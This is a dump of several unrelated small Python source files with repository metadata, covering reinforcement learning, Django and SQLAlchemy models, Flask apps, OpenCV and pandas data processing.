def memory_append(self, sars):
self.mem.append(sars)
class DuelQ(Layer):
def get_output_shape_for(self, input_shape):
return None, input_shape[1] - 1
def call(self, x, mask=None):
return K.expand_dims(x[:, -1] - K.mean(x[:, :-1], axis=1)) + x[:, :-1]
class DuelQa(Layer):
def get_output_shape_for(self, input_shape):
return None, 1
def call(self, z, mask=None):
x, a = z
return K.expand_dims(x[:, -1] - K.mean(x[:, :-1], axis=1) + x[K.arange(x.shape[0]), K.flatten(a)])
class PlayMemory(object):
def __init__(self, length, s_size):
self.max_length = length
self.S = np.zeros((self.max_length, 2, s_size), dtype=np.bool)
self.A = np.zeros((self.max_length, 1), dtype=np.int8)
self.R = np.zeros((self.max_length, 1), dtype=np.float32)
self.T = np.zeros((self.max_length, 1), dtype=np.bool)
self.Q = np.zeros((self.max_length, 1), dtype=np.float32)
self.length = 0
self.add_count = 0
self._i = self._rand_index()
def __len__(self):
return self.length
def _rand_index(self):
for i in range(self.max_length):
self.length = i + 1
yield i
while True:
for i in np.random.permutation(self.max_length):
yield i
def append(self, sars):
(s, a, r, t, ss) = sars
i = next(self._i)
self.S[i, 0] = s
self.S[i, 1] = ss
self.A[i] = a
self.R[i] = r
self.T[i] = t
self.Q[i] = 0
self.add_count += 1
main()
|
[
"[email protected]"
] | |
34179ff136b9b68223fd42cb9f5fbe54e95a88de
|
af0dcf80a36da4ac6894dc517ad1870f702c3122
|
/azure-mgmt-web/azure/mgmt/web/models/csm_publishing_profile_options.py
|
99b9542ab7d50b0a1d29b9d31f8743561ff5afa3
|
[
"Apache-2.0"
] |
permissive
|
FlavioAlexander/azure-sdk-for-python
|
4c6151ca17886f9e4d47e1ccc469859abdedca5a
|
8c7416749f9a5697e0311bc9af8fe5c0d524ca03
|
refs/heads/master
| 2021-01-24T02:34:37.194767 | 2016-07-03T23:47:23 | 2016-07-03T23:47:23 | 62,738,173 | 0 | 1 | null | 2016-07-06T16:54:12 | 2016-07-06T16:54:10 | null |
UTF-8
|
Python
| false | false | 1,346 |
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft and contributors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class CsmPublishingProfileOptions(Model):
"""Publishing options for requested profile.
:param format: Name of the format. Valid values are:
FileZilla3
WebDeploy -- default
Ftp
:type format: str
"""
_attribute_map = {
'format': {'key': 'format', 'type': 'str'},
}
def __init__(self, format=None):
self.format = format
|
[
"[email protected]"
] | |
d0bbe41af3a825c8397a6ae8f3261c2be29c4625
|
15960f0aa40915ddc93cd5c8a840a4abfb167cf1
|
/groups/models.py
|
0fae1fa57df655ee1187afa7e7aea983641ef30c
|
[] |
no_license
|
phouse512/piper
|
74d815fd443482abc80418dbed678b1431e17eb9
|
70f651db8af4edb625f6ba249556d3c2d04a350b
|
refs/heads/master
| 2022-05-04T20:36:56.354336 | 2018-12-19T04:28:23 | 2018-12-19T04:28:23 | 40,972,739 | 0 | 0 | null | 2018-11-17T16:56:21 | 2015-08-18T13:13:15 |
Python
|
UTF-8
|
Python
| false | false | 399 |
py
|
from django.db import models
from users.models import User
class Group(models.Model):
id = models.AutoField(primary_key=True)
name = models.CharField(max_length=30)
class Meta:
db_table = 'groups'
class GroupMembership(models.Model):
id = models.AutoField(primary_key=True)
user = models.ForeignKey(User)
group = models.ForeignKey(Group)
class Meta:
db_table = 'groups_membership'
|
[
"[email protected]"
] | |
ff394e97747dd634f04822bfb6ae50e11a289760
|
ecf33e849afc7379070b7e088f957536b5736b50
|
/models/user.py
|
66c53ddc7b45c5ffa7d234b27b28b5e87340f616
|
[] |
no_license
|
AhmedKaramDev/FlaskRESTful_API
|
e5eeb7af05ca5b75937b577959f9f0e5262e92b4
|
cde3fb9178382d56da4bcec38414489209f9e171
|
refs/heads/master
| 2020-06-01T22:15:00.477844 | 2019-06-09T14:22:15 | 2019-06-09T14:22:15 | 190,947,279 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,599 |
py
|
import sqlite3
from db import db
class UserModel(db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(80))
password = db.Column(db.String(80))
def __init__(self, username,password):
self.username = username
self.password = password
def save_to_db(self):
db.session.add(self)
db.session.commit()
@classmethod
def find_by_username(cls, username):
return cls.query.filter_by(username=username).first()
# connection = sqlite3.connect("data.db")
# cursor = connection.cursor()
# # get the data by username inserted
# query = "SELECT * FROM users WHERE username = ?"
# result = cursor.execute(query, (username,)) # to make username run first
# row = result.fetchone()
# if row:
# user = cls(*row) # row[0] id, row[1] username, row[2] password
# else:
# user = None
#
# connection.close()
# return user
@classmethod
def find_by_id(cls, _id):
return cls.query.filter_by(id=_id).first()
# connection = sqlite3.connect("testDatabase.db")
# cursor = connection.cursor()
# # get the data by id inserted
# query = "SELECT * FROM users WHERE id = ?"
#
# result = cursor.execute(query, (_id,)) # to make id run first
# row = result.fetchone()
# if row:
# _id = cls(*row)
# else:
# _id = None
#
# connection.close()
# return _id
|
[
"[email protected]"
] | |
14deabd526b83ff7e8fd5d52399cd3b61b61d267
|
dbce052f7322614fd4766e77139df5b7ca5c2908
|
/Previous OpenCV projects/border_opencv_logo.py
|
8883a3d238541486c85dda8f78e79d795c72e0e8
|
[
"MIT"
] |
permissive
|
dmiruke/Python-Pyimagesearch-IP
|
d0afb8930f1469f594bef885cbdef96a08d34f1f
|
e590bc7959cd062f9fe670f4249373f175c321b9
|
refs/heads/master
| 2022-02-19T17:22:29.246188 | 2019-09-30T21:05:58 | 2019-09-30T21:05:58 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 980 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 19 16:29:26 2017
# Successful
@author: Rukayat Ariori
"""
import cv2
import numpy as np
from matplotlib import pyplot as plt
BLUE = [255,0,0]
img1 = cv2.imread('opencv_logo.jpg')
replicate = cv2.copyMakeBorder(img1,10,10,10,10,cv2.BORDER_REPLICATE)
reflect = cv2.copyMakeBorder(img1,10,10,10,10,cv2.BORDER_REFLECT)
reflect101 = cv2.copyMakeBorder(img1,10,10,10,10,cv2.BORDER_REFLECT_101)
wrap = cv2.copyMakeBorder(img1,10,10,10,10,cv2.BORDER_WRAP)
constant= cv2.copyMakeBorder(img1,10,10,10,10,cv2.BORDER_CONSTANT,value=BLUE)
plt.subplot(231),plt.imshow(img1,'gray'),plt.title('ORIGINAL')
plt.subplot(232),plt.imshow(replicate,'gray'),plt.title('REPLICATE')
plt.subplot(233),plt.imshow(reflect,'gray'),plt.title('REFLECT')
plt.subplot(234),plt.imshow(reflect101,'gray'),plt.title('REFLECT_101')
plt.subplot(235),plt.imshow(wrap,'gray'),plt.title('WRAP')
plt.subplot(236),plt.imshow(constant,'gray'),plt.title('CONSTANT')
plt.show()
|
[
"[email protected]"
] | |
45c337f0ce82f23dcbacf2c49c590c23ac755887
|
789807122804d53b6855634ce86514f39c9bee13
|
/Remove_Duplicates_from_Sorted_List,py.py
|
bc4082922948f0f36630aa14039d8b4454dafc04
|
[] |
no_license
|
LRegan666/Athene_Leetcode
|
0da1490823b59f6ec59884f169709f376ea2c9ee
|
f621842bc8ce3c068b3279302e6de6ce484610a6
|
refs/heads/master
| 2020-04-15T02:07:05.574524 | 2019-02-23T11:13:20 | 2019-02-23T11:13:20 | 164,303,620 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 516 |
py
|
class Solution:
def deleteDuplicates(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
if not head:
return head
phead = head
prev_val = phead.val
while phead.next:
next_node = phead.next
next_val = next_node.val
if next_val == prev_val:
phead.next = next_node.next
else:
prev_val = next_val
phead = phead.next
return head
|
[
"[email protected]"
] | |
e153ba4d070ed7888466798b57dcc853f7ee5ee9
|
c8580191b571a4081fd2b1df9a73a890640a9778
|
/report_generator/__main__.py
|
80645c2de9f0b394bbb7cfa0841b729536e946f0
|
[] |
no_license
|
yanivfgl/UBCHelios
|
b0f08b99a505e79a800c56e9809768832cb71498
|
9f56765c199340959ba3ec81b81e16b811435af4
|
refs/heads/master
| 2020-07-14T01:56:49.320669 | 2019-08-29T00:56:59 | 2019-08-29T00:56:59 | 205,206,643 | 1 | 0 | null | 2019-08-29T16:34:11 | 2019-08-29T16:34:10 | null |
UTF-8
|
Python
| false | false | 1,696 |
py
|
import constants_rev as cs
import functions as fn
import si_formatter as si
print("Welcome to Mars Colony::Project HELIOS Calculations")
def print_report(revenue_desired=cs.REVENUE_DESIRED):
"""
generates report
:param revenue_desired: revenue desired
:return: prints the report
"""
# Prints information about He-3 Fusion
print("%s of energy per 3g He-3" % si.return_with_si(fn.energy_from_mass_he3(cs.He3_MOLAR_MASS), 'J'))
print("\nFor $ %s" % "{:,} in revenue:".format(revenue_desired))
energy_required = fn.energy_needed_for_revenue(revenue_desired)
print(" %s of energy required" % si.return_with_si(energy_required, 'J'))
he3_mass = fn.mass_he3_required_for_energy(energy_required)
print(" %s of mass of He3 required" % si.return_with_si(he3_mass, 'g'))
regolith_mass = fn.mass_regolith_to_retrieve_mass_he3(he3_mass)
print(" %s of mass of regolith required" % si.return_with_si(regolith_mass, 'g'))
print(" Rate per day of %s [D+N]" %
si.return_with_si(regolith_mass / cs.DAYS_IN_YEAR, 'g'))
print(" Rate per day of %s [D only]" %
si.return_with_si(2 * regolith_mass / cs.DAYS_IN_YEAR, 'g'))
print("Volatiles Generated: ")
for volatile in cs.volatile_he3_ratio.keys():
print(" %s of" % si.return_with_si(he3_mass * cs.VOLATILE_He3_RATIO[volatile], 'g'), volatile)
# print("%s of regolith per ton He-3" %
# return_with_si_units(affix_si_prefix(mass_regolith_to_retrieve_mass_he3(ONE_TON)), 'g')) # Mass in grams
print_report(1e9) # one billion dollars
# Find energy required to create desired revenue
# Find mass of He3 in g to create needed amount of energy
|
[
"[email protected]"
] | |
448647d2a2227132ad85b2902a4bbbd3b2d42474
|
399b69613df1700d19a0e803fe47fd8cbad365f7
|
/myansible/ansicfg/dhosts.py
|
a7030278867a479925cdec27a62abed9fd9ecd6c
|
[] |
no_license
|
hraa0101/python
|
13d05e6fc6ab40185d317f05e5ff520647437b59
|
5d16ff9b1599d3cba4386ef0cc7bea9a9de5c58f
|
refs/heads/master
| 2020-03-26T15:37:31.038126 | 2018-10-05T01:53:19 | 2018-10-05T01:53:19 | 145,054,373 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,327 |
py
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
#from __future__ import unicode_literals
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, String, Date, ForeignKey
from sqlalchemy.orm import sessionmaker
import json
engine = create_engine(
'sqlite:////root/桌面/ansible_project/myansible/db.sqlite3',
encoding='utf8'
)
Base = declarative_base()
Session = sessionmaker(bind=engine)
class Group(Base):
__tablename__ = 'webansi_group'
id = Column(Integer, primary_key=True)
hostgroup = Column(String(50))
def __str__(self):
return self.hostgroup
class Host(Base):
__tablename__ = 'webansi_host'
id = Column(Integer, primary_key=True)
hostname = Column(String(50))
ipaddr = Column(String(15))
group_id = Column(Integer, ForeignKey('webansi_group.id'))
if __name__ == '__main__':
session = Session()
qset = session.query(Group.hostgroup, Host.ipaddr).\
join(Host, Group.id==Host.group_id)
hosts = qset.all()
result = {}
# [(u'webservers', u'192.168.4.2'), (u'webservers', u'192.168.4.3')]
for group, ip in hosts:
if group not in result:
result[group] = {'hosts': []}
result[group]['hosts'].append(ip)
print(json.dumps(result))
|
[
"[email protected]"
] | |
4aad67a6a71395c673ae5f5856acede9f780ea61
|
ba268419a2d14261cec3dc5ef3aed325ec464f40
|
/Week5/Money in the bank/start.py
|
9e143450c57aea958af5d7dae3eec9d0ccc2844d
|
[] |
no_license
|
Hristiyan-Andreev/HackBuglaria
|
a12063cabb3f25f85d35b387eed4af6b521aeb99
|
64c362a135386b577d4a860e5f13fbbb506268b4
|
refs/heads/master
| 2021-01-19T07:43:52.987409 | 2014-12-07T12:49:08 | 2014-12-07T12:49:08 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,078 |
py
|
import sql_manager
import hashlib
import getpass
import datetime
def main_menu():
faillogin = 0
print("Welcome to our bank service. You are not logged in. \nPlease register or login")
while True:
command = input("$$$>")
if command == 'register':
username = input("Enter your username: ")
password = setpass(username)
sql_manager.register(username, password)
print("Registration Successfull")
elif command == 'login':
username = input("Enter your username: ")
failtime = sql_manager.getfailtime(username)
password = getpass.getpass("Enter your password: ")
#password = input("Enter your password: ")
#bytepass = ' '.join(format(x, 'b') for x in bytearray(password))
hashpass = hashlib.sha1(password.encode())
logged_user = sql_manager.login(username, hashpass.hexdigest())
if logged_user:
logged_menu(logged_user)
else:
faillogin += 1
if faillogin >= 5:
failuser = username
now = datetime.datetime.now()
failmin = now.minute
sql_manager.setfailtime(failuser, failmin)
print("Login failed")
elif command == 'help':
print("login - for logging in!")
print("register - for creating new account!")
print("exit - for closing program!")
elif command == 'exit':
break
else:
print("Not a valid command")
def logged_menu(logged_user):
print("Welcome you are logged in as: " + logged_user.get_username())
while True:
command = input("Logged>>")
if command == 'info':
print("You are: " + logged_user.get_username())
print("Your id is: " + str(logged_user.get_id()))
print("Your balance is:" + str(logged_user.get_balance()) + '$')
elif command == 'changepass':
new_pass = setpass(logged_user)
sql_manager.change_pass(new_pass, logged_user)
elif command == 'change-message':
new_message = input("Enter your new message: ")
sql_manager.change_message(new_message, logged_user)
elif command == 'show-message':
print(logged_user.get_message())
elif command == 'help':
print("info - for showing account info")
print("changepass - for changing passowrd")
print("change-message - for changing users message")
print("show-message - for showing users message")
def setpass(username):
message = "Your password must be:\n- More than 8 symbol\n -Contain at least one capital letter\
\n -Contain at east one lower letter\n -Contain at least one special symbol\n -Contain at least one digit"
print(message)
Chars = set(["!", "@", "#", "$", "%", "^", "&", "*", "(", ")", "_"])
while True:
password = getpass.getpass("Enter your password: ")
if (len(password) < 9):
error = "\nYour password is too short, it must be at least 8 symbols!"
print(error)
elif not (c for c in password if c.islower()):
error = "\nYour password has no lowercase symbols!"
print(error)
elif not (c for c in password if c.isupper()):
error = "\nYour password has no uppercase symbols!"
print(error)
elif not any(c in Chars for c in password):
error = "\nYour password has no sepcial symbols!"
print(error)
elif (username in password):
error = "\nYour password must not contain your username!"
print(error)
else:
break
#bytepass = ' '.join(format(x, 'b') for x in bytearray(password))
hashpass = hashlib.sha1(password.encode())
return hashpass.hexdigest()
def main():
sql_manager.create_clients_table()
main_menu()
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
c308ae66daa33b8c226cc21d524b24a164a41d1d
|
abbc40722942a449e1f1fcb802d573228cc4b64c
|
/prototype.py
|
d6ed8d6c82dae80e5b84450487e12ff5da9da0fe
|
[] |
no_license
|
dwaard/pylogger
|
6176d177b2d7b77d1aaab30a5c4497c30d65298b
|
ca9d9b0421fd09dadd5b499afae345b03d39b194
|
refs/heads/master
| 2021-01-17T17:31:53.916167 | 2017-02-23T19:31:40 | 2017-02-23T19:31:40 | 82,963,536 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 297 |
py
|
import matplotlib.pyplot as plt
from receiver import Receiver
from serialreader import Reader
from logger import Logger
from plotter import Plotter
# setup the reader, logger and plotter
fig, axes = plt.subplots()
r = Receiver(Reader(), Logger(), Plotter(axes))
r.start()
plt.legend()
plt.show()
|
[
"[email protected]"
] | |
c5420358fb87484239026919e290e881a7b4c6c4
|
2ce0c37ac7d9beeac23db688f97a1f502b92d13a
|
/store/models/store.py
|
878b20d11d588de233e55c8908f1c894374734b0
|
[] |
no_license
|
AmrElsayedEG/inventory-system
|
0cdb0634b33117b13bfcae8642f979448d831369
|
d4bc483612c3b721918d75f24ab0d7fa29b78ce3
|
refs/heads/main
| 2023-08-20T22:32:25.113740 | 2021-10-04T08:55:44 | 2021-10-04T08:55:44 | 413,344,692 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 261 |
py
|
from django.db import models
class Store(models.Model):
name = models.CharField(max_length=100)
address = models.CharField(max_length=200)
coordinates = models.JSONField(blank=True, null=True)
def __str__(self) -> str:
return self.name
|
[
"[email protected]"
] | |
a560d10713bc976b978431314f53a75111c1555a
|
3aa8222bb2edc93c9202ccbcf6f331cdf73cd5a2
|
/FundRatingNSDL/nsdl_extraction/setup.py
|
ac0e1546b51b54b85c28ad5f48c2c3952b296cc5
|
[] |
no_license
|
pavithra-ft/ft-automation
|
a977809823e587efd596b02e3a8286f887d12116
|
946e1c35b785bfc3ea31d5903e021d4bc99fe302
|
refs/heads/main
| 2023-04-24T19:54:28.478577 | 2021-05-11T17:53:08 | 2021-05-11T17:53:08 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 237 |
py
|
# Automatically created by: scrapyd-deploy
from setuptools import setup, find_packages
setup(
name='project',
version='1.0',
packages=find_packages(),
entry_points={'scrapy': ['settings = nsdl_extraction.settings']},
)
|
[
"[email protected]"
] | |
a25d41807d5e355c5a7487c2a5485d6b49d1dbdb
|
331897b7af41f719edba54587b01407d20b5fc07
|
/backend/models.py
|
9c52d2e988b0fa6018b1beec112ff1dbe070c076
|
[] |
no_license
|
JaysesS/Hackathon
|
8ceb023e753479ef8eb64a2b4d4302f784df82ed
|
dff2afa5db9163e2f14a26013156c9fe80af3255
|
refs/heads/master
| 2023-07-26T06:23:11.445218 | 2021-08-29T12:00:42 | 2021-08-29T12:00:42 | 400,645,929 | 0 | 0 | null | 2021-08-29T12:00:43 | 2021-08-27T22:10:38 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 6,593 |
py
|
from typing import List, Optional
from flask import g
from datetime import datetime
from sqlalchemy import Column, ForeignKey, Integer, String, Boolean, Sequence, Index, func, create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import backref, relationship, remote, foreign, sessionmaker
from sqlalchemy import func
from sqlalchemy_utils import LtreeType, Ltree
from sqlalchemy_utils.types.ltree import LQUERY
import json
from schemas.user import UserChildrenSchema, UserSchema
from config import Config
Base = declarative_base()
engine = create_engine(Config.SQLALCHEMY_DATABASE_URI,
**Config.SQLALCHEMY_ENGINE_OPTIONS)
id_seq = Sequence("nodes_id_seq")
class User(Base):
__tablename__ = "user"
id = Column(Integer, id_seq, primary_key=True)
name = Column(String, nullable=False)
position = Column(String, nullable=False)
path = Column(LtreeType, nullable=False)
parent = relationship(
"User",
primaryjoin=(remote(path) == foreign(func.subpath(path, 0, -1))),
backref="children",
viewonly=True,
)
def __init__(self, name, position, parent=None):
_id = engine.execute(id_seq)
self.id = _id
self.name = name
self.position = position
ltree_id = Ltree(str(_id))
self.path = ltree_id if parent is None else parent.path + ltree_id
__table_args__ = (Index("ix_nodes_path", path, postgresql_using="gist"),)
def show_json(self):
schema = UserChildrenSchema()
print(json.dumps(schema.dump(self), indent=4))
def to_json(self):
schema = UserChildrenSchema()
return schema.dump(self)
def delete(self):
g.session.delete(self)
g.session.commit()
@staticmethod
def nodes_to_json(nodes: List["User"]) -> dict:
schema = UserChildrenSchema()
return schema.dump(nodes, many=True)
@classmethod
def get_flat_list(cls, list = None) -> List[dict]:
schema = UserSchema()
return schema.dump(g.session.query(User).all(), many=True)
@classmethod
def get_by_level(cls, level: int) -> List["User"]:
return g.session.query(cls).filter(
func.nlevel(cls.path) == level).all()
@classmethod
def get_by_id(cls, id: int) -> "User":
return g.session.query(cls).filter_by(id=id).first()
@classmethod
def get_by_name(cls, name: int) -> "User":
return g.session.query(cls).filter_by(name=name).first()
@classmethod
def insert_node(cls, parent_id: int, name: str, position: str) -> Optional["User"]:
parent = cls.get_by_id(parent_id)
if parent:
node = cls(name=name, position=position, parent=parent)
g.session.add(node)
g.session.commit()
return node
return None
def __repr__(self):
return 'User({})'.format(self.name)
class Task(Base):
__tablename__ = "task"
id = Column(Integer, nullable=False, primary_key=True)
name = Column(String, nullable=False, unique=False)
process_name = Column(String, nullable=False, unique=False)
start_time = Column(Integer, nullable=False)
due_time = Column(Integer, nullable=False)
end_time = Column(Integer, nullable=True)
priority = Column(Integer, nullable=False)
var_count = Column(Integer, nullable=False)
owner_id = Column(Integer, ForeignKey('user.id'), nullable=False)
assigner_id = Column(Integer, ForeignKey('user.id'), nullable=True)
owner = relationship(User, foreign_keys=[owner_id], backref='tasks_own')
assigner = relationship(
User, foreign_keys=[assigner_id], backref='tasks_assign')
started = Column(Boolean, server_default='t', default=False)
was_started = Column(Boolean, server_default='t', default=False)
def __repr__(self) -> str:
return f"Task({self.process_name} -> {self.name})"
def is_started(self):
return self.started
def change_state(self, state):
if state == "start":
return self.start()
return self.stop()
def start(self):
if not self.was_started:
self.started = True
self.was_started = True
g.session.commit()
return self
# TASK WAS STARTED BEFORE
return None
def stop(self):
if self.started:
self.started = False
self.end_time = datetime.now().timestamp()
g.session.commit()
return self
# STOP STOPED TASK??)
return None
@classmethod
def get_by_id(cls, id: int) -> "Task":
return g.session.query(cls).filter_by(id=id).first()
def get_session():
Session = sessionmaker(bind=engine)
return Session()
# To create a tree like the example shown
# at the top of this post:
# cats = Node("cats")
# big = Node("big", parent=cats)
# small = Node("small", parent=cats)
# wild = Node("wild", parent=small)
# domestic = Node("domestic", parent=small)
# session.add_all((cats, big, small, wild, domestic))
# for big_cat in ("lion", "tiger", "jaguar"):
# session.add(Node(big_cat, parent=big))
# for small_wildcat in ("ocelot", "bobcat"):
# session.add(Node(small_wildcat, parent=wild))
# for domestic_cat in ("persian", "bengal", "shorthair"):
# session.add(Node(domestic_cat, parent=domestic))
# session.flush()
# To retrieve a whole subtree:
# whole_subtree = session.query(Node).filter(
# Node.path.descendant_of(domestic.path)).all()
# print('Whole subtree:', whole_subtree)
# [domestic, persian, bengal, shorthair]
# Get only the third layer of nodes:
# third_layer = session.query(Node).filter(func.nlevel(Node.path) == 3).all()
# print('Third layer:', third_layer)
# [wild, domestic, lion, tiger, jaguar]
# Get all the siblings of a node:
# shorthair = session.query(Node).filter_by(name="shorthair").one()
# siblings = session.query(Node).filter(
# # We can use Python's slice notation on ltree paths:
# Node.path.descendant_of(shorthair.path[:-1]),
# func.nlevel(Node.path) == len(shorthair.path),
# Node.id != shorthair.id,
# ).all()
# print('Siblings of shorthair:', siblings)
# [persian, bengal]
# Using an LQuery to get immediate children of two parent nodes at different depths:
# query = "*.%s|%s.*{1}" % (big.id, wild.id)
# lquery = expression.cast(query, LQUERY)
# immediate_children = session.query(Node).filter(Node.path.lquery(lquery)).all()
# print('Immediate children of big and wild:', immediate_children)
# [lion, tiger, ocelot, jaguar, bobcat]
|
[
"[email protected]"
] | |
55449c7a1ec4597c4f9f4692300b0cefdab77ba4
|
ad8590e6049d88ef0829f80c0ce427f299a1c719
|
/backend/models/ProjectModels.py
|
77bddc490f223b6622b28e0c17a4915f955d1ffc
|
[] |
no_license
|
liujue520/VotingManagement
|
33ccca02039b7de0f3fb3aa7c5392b0afdde3918
|
8c5b812e68514062d2f34963917d7679309abdca
|
refs/heads/master
| 2022-12-23T03:39:45.929603 | 2020-09-18T01:23:37 | 2020-09-18T01:23:37 | 292,767,540 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,779 |
py
|
from django.db import models
import uuid
class Project(models.Model):
ProjectId = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
ProjectName = models.CharField(max_length=32, verbose_name="项目名称", default="输入项目名")
Created = models.DateTimeField(auto_now_add=True,verbose_name='创建时间')
Update = models.DateTimeField(auto_now=True,verbose_name='更新时间')
StartingTime = models.DateField(auto_now=False, auto_now_add=False, verbose_name="开始时间")
EndTime = models.DateField(auto_now=False, auto_now_add=False, verbose_name="结束时间")
ProjectNumber = models.IntegerField(verbose_name="项目号", blank=True, auto_created=True,default=None)
ProjectGroup = models.ForeignKey('ProjectGroup', on_delete=models.CASCADE,default=None)
class Meta:
db_table='Project'
verbose_name='Project_项目表'
verbose_name_plural=verbose_name
def __str__(self):
return self.ProjectName
class Rule(models.Model):
RuleId = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
RuleName = models.CharField(max_length=32, verbose_name="规则名", default="规则名")
Created = models.DateTimeField(auto_now_add=True, verbose_name='创建时间')
Update = models.DateTimeField(auto_now=True, verbose_name='更新时间')
class Meta:
db_table = 'Rule'
verbose_name = 'Project_规则表'
verbose_name_plural = verbose_name
def __str__(self):
return self.RuleName
class ProjectGroup(models.Model):
ProjectGroupId = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
ProjectGroupName = models.CharField(max_length=32, verbose_name="项目组名", default="项目组名")
Rule = models.ManyToManyField(Rule, through='RuleProjectGroup')
Created = models.DateTimeField(auto_now_add=True, verbose_name='创建时间')
Update = models.DateTimeField(auto_now=True, verbose_name='更新时间')
class Meta:
db_table='ProjectGroup'
verbose_name='Project_项目组表'
verbose_name_plural=verbose_name
def __str__(self):
return self.ProjectGroupName
class RuleProjectGroup(models.Model):
RuleProjectGroupId = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
Rule= models.ForeignKey(Rule, on_delete=models.CASCADE)
ProjectGroup= models.ForeignKey(ProjectGroup, on_delete=models.CASCADE)
Created = models.DateTimeField(auto_now_add=True, verbose_name='创建时间')
Update = models.DateTimeField(auto_now=True, verbose_name='更新时间')
class Meta:
db_table='RuleProjectGroup'
verbose_name='Project_规则组表'
verbose_name_plural=verbose_name
|
[
"[email protected]"
] | |
d46378b10661fadbaff034e5e9e9071f4bb301b6
|
88c4be065cb3b6904994b1718a75736c87241633
|
/web/app.py
|
ff37699e91caa6afb592a37b5597b54886c5cd7d
|
[] |
no_license
|
RomUriy/Animation-Creator
|
b0d82710e21c7c01efc6863c086f9a8bb54e501a
|
98cdb2af014925c2fe99bb8805b76c3b12d1fcd9
|
refs/heads/master
| 2022-08-10T15:58:17.322825 | 2018-06-14T15:01:51 | 2018-06-14T15:01:51 | 137,210,209 | 0 | 0 | null | 2022-07-07T22:58:54 | 2018-06-13T12:06:43 |
Python
|
UTF-8
|
Python
| false | false | 1,524 |
py
|
import boto3
import os
import json
from flask import Flask
from flask import render_template, request, flash
from media.s3_storage import S3MediaStorage
from media.name_generator import generate_name
from flask_bootstrap import Bootstrap
app = Flask(__name__)
Bootstrap(app)
s3 = boto3.resource('s3')
media_storage = S3MediaStorage(s3, os.getenv('APP_BUCKET_NAME'))
photos_list=[]
sqs = boto3.resource('sqs', region_name="eu-central-1")
requestQueue = sqs.get_queue_by_name(
QueueName=os.getenv("APP_QUEUE_NAME")
)
@app.route("/")
def hello():
return render_template(
'upload_files.html'
)
@app.route("/upload", methods=['POST'])
def handle_upload():
if 'uploaded_file' not in request.files:
flash('No file part')
return redirect(request.url)
uploaded_file = request.files['uploaded_file']
destination_name = generate_name(uploaded_file.filename)
media_storage.store(
dest=destination_name,
source=uploaded_file
)
photos_list.append(destination_name)
return prepare()
@app.route("/proceed", methods=["POST"])
def proceed_animation():
ani_request = {
"email": request.form['email'],
"photos": photos_list
}
requestQueue.send_message(
MessageBody=json.dumps(ani_request)
)
return render_template(
'proceed.html'
)
@app.route("/prepare")
def prepare():
return render_template(
'prepare.html',
invitation="Photo list",
photos=photos_list
)
if __name__ == '__main__':
app.run(host="0.0.0.0", port=8080, debug=True)
|
[
"[email protected]"
] | |
c097371ef72a1eee6842648f528eab90ff75039d
|
60b76b2904b3f38d5f12e07c007fd2902e34d599
|
/importdf_backup.py
|
249083b97ee3994828022ab004744fdc9abbea4d
|
[] |
no_license
|
nzminki0621/diveroid
|
a53485674a255dbd8fb7dae68ec78ce7b2097cff
|
3fb7cbed2b3f621f98318f8518681253a0a9ce6c
|
refs/heads/master
| 2023-02-04T06:28:12.782823 | 2020-12-26T16:47:34 | 2020-12-26T16:47:34 | 313,373,606 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,066 |
py
|
import pandas as pd
import numpy as np
from datetime import datetime as dt
import datetime
import timezone as tz
def timeplus(row):
try:
return row.datetime64 + datetime.timedelta(hours=tz.us_time[row.geo_region])
except:
return row.human_time
def timeplus_world(row):
try:
return row.datetime64 + datetime.timedelta(hours=tz.world_time[row.geo_country])
except:
return row.human_time
def divide_by_mil(i):
return i/1000000
def df_proc(df):
df['datetime64'] = df.event_timestamp.map(int).map(divide_by_mil).map(dt.fromtimestamp).map(np.datetime64)
df['human_time'] = df['datetime64']
df['human_time'] = df.apply(timeplus_world, axis=1) #세계 시간대 보정
df['human_time'] = df.apply(timeplus, axis=1) #미국 시간대 보정
first_visit = df[df.event_name == 'first_visit']
click_target = df[df.event_name == 'click_target']
return df, first_visit, click_target
def df_us(df):
us = df[df.geo_country == 'United States'].reset_index(drop=True)
us = us.dropna(subset = ['geo_region'])
us_first_visit = us[us.event_name == 'first_visit' ]
us_click_target = us[us.event_name == 'click_target' ]
return us, us_first_visit, us_click_target
df_all = pd.concat([pd.read_csv('20201110.csv'),pd.read_csv('20201111.csv'),pd.read_csv('20201112.csv'),pd.read_csv('20201113.csv'),pd.read_csv('20201114.csv'),pd.read_csv('20201115.csv')])
df_all, df_first_visit, df_click_target = df_proc(df_all)
df10 = pd.read_csv('20201110.csv')
